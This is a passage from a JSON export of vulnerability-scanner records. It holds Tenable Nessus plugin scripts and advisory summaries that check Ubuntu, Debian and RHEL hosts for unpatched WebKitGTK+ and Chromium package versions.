variety of issues related to web browser security, including cross-site scripting attacks, denial of service attacks, and arbitrary code execution.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-04-17T00:00:00", "type": "nessus", "title": "Ubuntu 18.04 LTS / 18.10 : WebKitGTK+ vulnerabilities (USN-3948-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-11070", "CVE-2019-6251", "CVE-2019-8375", "CVE-2019-8506", "CVE-2019-8518", "CVE-2019-8523", "CVE-2019-8524", "CVE-2019-8535", "CVE-2019-8536", "CVE-2019-8544", "CVE-2019-8551", "CVE-2019-8558", "CVE-2019-8559", "CVE-2019-8563"], "modified": "2022-05-06T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:libjavascriptcoregtk-4.0-18", "p-cpe:/a:canonical:ubuntu_linux:libwebkit2gtk-4.0-37", "cpe:/o:canonical:ubuntu_linux:18.04:-:lts", "cpe:/o:canonical:ubuntu_linux:18.10"], "id": "UBUNTU_USN-3948-1.NASL", "href": "https://www.tenable.com/plugins/nessus/124115", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3948-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(124115);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/06\");\n\n script_cve_id(\"CVE-2019-11070\", \"CVE-2019-6251\", \"CVE-2019-8375\", \"CVE-2019-8506\", \"CVE-2019-8518\", \"CVE-2019-8523\", \"CVE-2019-8524\", \"CVE-2019-8535\", \"CVE-2019-8536\", \"CVE-2019-8544\", \"CVE-2019-8551\", \"CVE-2019-8558\", \"CVE-2019-8559\", \"CVE-2019-8563\");\n script_xref(name:\"USN\", value:\"3948-1\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/25\");\n\n script_name(english:\"Ubuntu 18.04 LTS / 18.10 : WebKitGTK+ vulnerabilities (USN-3948-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"A large number of security issues were discovered in the WebKitGTK+\nWeb and JavaScript engines. If a user were tricked into viewing a\nmalicious website, a remote attacker could exploit a variety of issues\nrelated to web browser security, including cross-site scripting\nattacks, denial of service attacks, and arbitrary code execution.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3948-1/\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Update the affected libjavascriptcoregtk-4.0-18 and / or\nlibwebkit2gtk-4.0-37 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-8544\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libjavascriptcoregtk-4.0-18\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libwebkit2gtk-4.0-37\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:18.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:18.10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/01/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/04/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/04/17\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2019-2022 Canonical, Inc. / NASL script (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(18\\.04|18\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 18.04 / 18.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"18.04\", pkgname:\"libjavascriptcoregtk-4.0-18\", pkgver:\"2.24.1-0ubuntu0.18.04.1\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"libwebkit2gtk-4.0-37\", pkgver:\"2.24.1-0ubuntu0.18.04.1\")) flag++;\nif (ubuntu_check(osver:\"18.10\", pkgname:\"libjavascriptcoregtk-4.0-18\", pkgver:\"2.24.1-0ubuntu0.18.10.2\")) flag++;\nif (ubuntu_check(osver:\"18.10\", pkgname:\"libwebkit2gtk-4.0-37\", pkgver:\"2.24.1-0ubuntu0.18.10.2\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libjavascriptcoregtk-4.0-18 / libwebkit2gtk-4.0-37\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:35:50", "description": "A large number of security issues were discovered in the WebKitGTK+ Web and JavaScript engines. If a user were tricked into viewing a malicious website, a remote attacker could exploit a variety of issues related to web browser security, including cross-site scripting attacks, denial of service attacks, and arbitrary code execution.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2017-08-03T00:00:00", "type": "nessus", "title": "Ubuntu 16.04 LTS / 17.04 : webkit2gtk vulnerabilities (USN-3376-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-2538", "CVE-2017-7018", "CVE-2017-7030", "CVE-2017-7034", "CVE-2017-7037", "CVE-2017-7039", "CVE-2017-7046", "CVE-2017-7048", "CVE-2017-7052", "CVE-2017-7055", "CVE-2017-7056", "CVE-2017-7061", "CVE-2017-7064"], "modified": "2019-09-18T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:libjavascriptcoregtk-4.0-18", "p-cpe:/a:canonical:ubuntu_linux:libwebkit2gtk-4.0-37", "cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/o:canonical:ubuntu_linux:17.04"], "id": "UBUNTU_USN-3376-1.NASL", "href": "https://www.tenable.com/plugins/nessus/102161", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3376-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(102161);\n script_version(\"3.8\");\n script_cvs_date(\"Date: 2019/09/18 12:31:47\");\n\n script_cve_id(\"CVE-2017-2538\", \"CVE-2017-7018\", \"CVE-2017-7030\", \"CVE-2017-7034\", \"CVE-2017-7037\", \"CVE-2017-7039\", \"CVE-2017-7046\", \"CVE-2017-7048\", \"CVE-2017-7052\", \"CVE-2017-7055\", \"CVE-2017-7056\", \"CVE-2017-7061\", \"CVE-2017-7064\");\n script_xref(name:\"USN\", value:\"3376-1\");\n\n script_name(english:\"Ubuntu 16.04 LTS / 17.04 : webkit2gtk vulnerabilities (USN-3376-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A large number of security issues were discovered in the WebKitGTK+\nWeb and JavaScript engines. If a user were tricked into viewing a\nmalicious website, a remote attacker could exploit a variety of issues\nrelated to web browser security, including cross-site scripting\nattacks, denial of service attacks, and arbitrary code execution.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3376-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected libjavascriptcoregtk-4.0-18 and / or\nlibwebkit2gtk-4.0-37 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libjavascriptcoregtk-4.0-18\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libwebkit2gtk-4.0-37\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:17.04\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/05/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/08/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/08/03\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2017-2019 Canonical, Inc. / NASL script (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(16\\.04|17\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 16.04 / 17.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"16.04\", pkgname:\"libjavascriptcoregtk-4.0-18\", pkgver:\"2.16.6-0ubuntu0.16.04.1\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"libwebkit2gtk-4.0-37\", pkgver:\"2.16.6-0ubuntu0.16.04.1\")) flag++;\nif (ubuntu_check(osver:\"17.04\", pkgname:\"libjavascriptcoregtk-4.0-18\", pkgver:\"2.16.6-0ubuntu0.17.04.1\")) flag++;\nif (ubuntu_check(osver:\"17.04\", pkgname:\"libwebkit2gtk-4.0-37\", pkgver:\"2.16.6-0ubuntu0.17.04.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libjavascriptcoregtk-4.0-18 / libwebkit2gtk-4.0-37\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-09T18:55:15", "description": "Several vulnerabilities have been discovered in the chromium web browser.\n\n - CVE-2018-5179 Yannic Boneberger discovered an error in the ServiceWorker implementation.\n\n - CVE-2018-17462 Ned Williamson and Niklas Baumstark discovered a way to escape the sandbox.\n\n - CVE-2018-17463 Ned Williamson and Niklas Baumstark discovered a remote code execution issue in the v8 JavaScript library.\n\n - CVE-2018-17464 xisigr discovered a URL spoofing issue.\n\n - CVE-2018-17465 Lin Zuojian discovered a use-after-free issue in the v8 JavaScript library.\n\n - CVE-2018-17466 Omair discovered a memory corruption issue in the angle library.\n\n - CVE-2018-17467 Khalil Zhani discovered a URL spoofing issue.\n\n - CVE-2018-17468 Jams Lee discovered an information disclosure issue.\n\n - CVE-2018-17469 Zhen Zhou discovered a buffer overflow issue in the pdfium library.\n\n - CVE-2018-17470 Zhe Jin discovered a memory corruption issue in the GPU backend implementation.\n\n - CVE-2018-17471 Lnyas Zhang discovered an issue with the full screen user interface.\n\n - CVE-2018-17473 Khalil Zhani discovered a URL spoofing issue.\n\n - CVE-2018-17474 Zhe Jin discovered a use-after-free issue.\n\n - CVE-2018-17475 Vladimir Metnew discovered a URL spoofing issue.\n\n - CVE-2018-17476 Khalil Zhani discovered an issue with the full screen user interface.\n\n - CVE-2018-17477 Aaron Muir Hamilton discovered a user interface spoofing issue in the extensions pane.\n\nThis update also fixes a buffer overflow in the embedded lcms library included with chromium.", "cvss3": {"score": 9.6, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"}, "published": "2018-11-05T00:00:00", "type": "nessus", "title": "Debian DSA-4330-1 : chromium-browser - security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-17462", "CVE-2018-17463", "CVE-2018-17464", "CVE-2018-17465", "CVE-2018-17466", "CVE-2018-17467", "CVE-2018-17468", "CVE-2018-17469", "CVE-2018-17470", "CVE-2018-17471", "CVE-2018-17473", "CVE-2018-17474", "CVE-2018-17475", "CVE-2018-17476", "CVE-2018-17477", "CVE-2018-5179"], "modified": "2022-06-09T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:chromium-browser", "cpe:/o:debian:debian_linux:9.0"], "id": "DEBIAN_DSA-4330.NASL", "href": "https://www.tenable.com/plugins/nessus/118719", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-4330. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(118719);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/06/09\");\n\n script_cve_id(\"CVE-2018-17462\", \"CVE-2018-17463\", \"CVE-2018-17464\", \"CVE-2018-17465\", \"CVE-2018-17466\", \"CVE-2018-17467\", \"CVE-2018-17468\", \"CVE-2018-17469\", \"CVE-2018-17470\", \"CVE-2018-17471\", \"CVE-2018-17473\", \"CVE-2018-17474\", \"CVE-2018-17475\", \"CVE-2018-17476\", \"CVE-2018-17477\", \"CVE-2018-5179\");\n script_xref(name:\"DSA\", value:\"4330\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/22\");\n\n script_name(english:\"Debian DSA-4330-1 : chromium-browser - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Several vulnerabilities have been discovered in the chromium web\nbrowser.\n\n - CVE-2018-5179\n Yannic Boneberger discovered an error in the\n ServiceWorker implementation.\n\n - CVE-2018-17462\n Ned Williamson and Niklas Baumstark discovered a way to\n escape the sandbox.\n\n - CVE-2018-17463\n Ned Williamson and Niklas Baumstark discovered a remote\n code execution issue in the v8 JavaScript library.\n\n - CVE-2018-17464\n xisigr discovered a URL spoofing issue.\n\n - CVE-2018-17465\n Lin Zuojian discovered a use-after-free issue in the v8\n JavaScript library.\n\n - CVE-2018-17466\n Omair discovered a memory corruption issue in the angle\n library.\n\n - CVE-2018-17467\n Khalil Zhani discovered a URL spoofing issue.\n\n - CVE-2018-17468\n Jams Lee discovered an information disclosure issue.\n\n - CVE-2018-17469\n Zhen Zhou discovered a buffer overflow issue in the\n pdfium library.\n\n - CVE-2018-17470\n Zhe Jin discovered a memory corruption issue in the GPU\n backend implementation.\n\n - CVE-2018-17471\n Lnyas Zhang discovered an issue with the full screen\n user interface.\n\n - CVE-2018-17473\n Khalil Zhani discovered a URL spoofing issue.\n\n - CVE-2018-17474\n Zhe Jin discovered a use-after-free issue.\n\n - CVE-2018-17475\n Vladimir Metnew discovered a URL spoofing issue.\n\n - CVE-2018-17476\n Khalil Zhani discovered an issue with the full screen\n user interface.\n\n - CVE-2018-17477\n Aaron Muir Hamilton discovered a user interface spoofing\n issue in the extensions pane.\n\nThis update also fixes a buffer overflow in the embedded lcms library\nincluded with chromium.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2018-5179\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2018-17462\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2018-17463\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2018-17464\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2018-17465\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2018-17466\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2018-17467\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2018-17468\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2018-17469\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2018-17470\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2018-17471\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2018-17473\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2018-17474\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2018-17475\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2018-17476\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2018-17477\"\n );\n # https://security-tracker.debian.org/tracker/source-package/chromium-browser\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?e33901a2\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/stretch/chromium-browser\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2018/dsa-4330\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Upgrade the chromium-browser packages.\n\nFor the stable distribution (stretch), these problems have been fixed\nin version 70.0.3538.67-1~deb9u1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-17474\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Google Chrome 67, 68 and 69 Object.create exploit');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:chromium-browser\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:9.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/11/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/11/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/11/05\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"9.0\", prefix:\"chromedriver\", reference:\"70.0.3538.67-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"chromium\", reference:\"70.0.3538.67-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"chromium-driver\", reference:\"70.0.3538.67-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"chromium-l10n\", reference:\"70.0.3538.67-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"chromium-shell\", reference:\"70.0.3538.67-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"chromium-widevine\", reference:\"70.0.3538.67-1~deb9u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-09T18:53:25", "description": "An update for chromium-browser is now available for Red Hat Enterprise Linux 6 Supplementary.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nChromium is an open source web browser, powered by WebKit (Blink).\n\nThis update upgrades Chromium to version 70.0.3538.67.\n\nSecurity Fix(es) :\n\n* chromium-browser: Sandbox escape in AppCache (CVE-2018-17462)\n\n* chromium-browser: Remote code execution in V8 (CVE-2018-17463)\n\n* chromium-browser: URL spoof in Omnibox (CVE-2018-17464)\n\n* chromium-browser: Use after free in V8 (CVE-2018-17465)\n\n* chromium-browser: Memory corruption in Angle (CVE-2018-17466)\n\n* lcms2: Integer overflow in AllocateDataSet() in cmscgats.c leading to heap-based buffer overflow (CVE-2018-16435)\n\n* chromium-browser: URL spoof in Omnibox (CVE-2018-17467)\n\n* chromium-browser: Cross-origin URL disclosure in Blink (CVE-2018-17468)\n\n* chromium-browser: Heap buffer overflow in PDFium (CVE-2018-17469)\n\n* chromium-browser: Memory corruption in GPU Internals (CVE-2018-17470)\n\n* chromium-browser: Security UI occlusion in full screen mode (CVE-2018-17471)\n\n* chromium-browser: URL spoof in Omnibox (CVE-2018-17473)\n\n* chromium-browser: Use after free in Blink (CVE-2018-17474)\n\n* chromium-browser: Lack of limits on update() in ServiceWorker (CVE-2018-5179)\n\n* chromium-browser: URL spoof in Omnibox (CVE-2018-17475)\n\n* chromium-browser: Security UI occlusion in full screen mode (CVE-2018-17476)\n\n* chromium-browser: UI spoof in Extensions (CVE-2018-17477)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"score": 9.6, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"}, "published": "2018-10-25T00:00:00", "type": "nessus", "title": "RHEL 6 : chromium-browser (RHSA-2018:3004)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-16435", "CVE-2018-17462", "CVE-2018-17463", "CVE-2018-17464", "CVE-2018-17465", "CVE-2018-17466", "CVE-2018-17467", "CVE-2018-17468", "CVE-2018-17469", "CVE-2018-17470", "CVE-2018-17471", "CVE-2018-17473", "CVE-2018-17474", "CVE-2018-17475", "CVE-2018-17476", "CVE-2018-17477", "CVE-2018-5179"], "modified": "2022-06-08T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:chromium-browser", "p-cpe:/a:redhat:enterprise_linux:chromium-browser-debuginfo", "cpe:/o:redhat:enterprise_linux:6"], "id": "REDHAT-RHSA-2018-3004.NASL", "href": "https://www.tenable.com/plugins/nessus/118373", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2018:3004. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(118373);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/06/08\");\n\n script_cve_id(\n \"CVE-2018-5179\",\n \"CVE-2018-16435\",\n \"CVE-2018-17462\",\n \"CVE-2018-17463\",\n \"CVE-2018-17464\",\n \"CVE-2018-17465\",\n \"CVE-2018-17466\",\n \"CVE-2018-17467\",\n \"CVE-2018-17468\",\n \"CVE-2018-17469\",\n \"CVE-2018-17470\",\n \"CVE-2018-17471\",\n \"CVE-2018-17473\",\n \"CVE-2018-17474\",\n \"CVE-2018-17475\",\n \"CVE-2018-17476\",\n \"CVE-2018-17477\"\n );\n script_xref(name:\"RHSA\", value:\"2018:3004\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/22\");\n\n script_name(english:\"RHEL 6 : chromium-browser (RHSA-2018:3004)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update for chromium-browser is now available for Red Hat Enterprise\nLinux 6 Supplementary.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nChromium is an open source web browser, powered by WebKit (Blink).\n\nThis update upgrades Chromium to version 70.0.3538.67.\n\nSecurity Fix(es) :\n\n* chromium-browser: Sandbox escape in AppCache 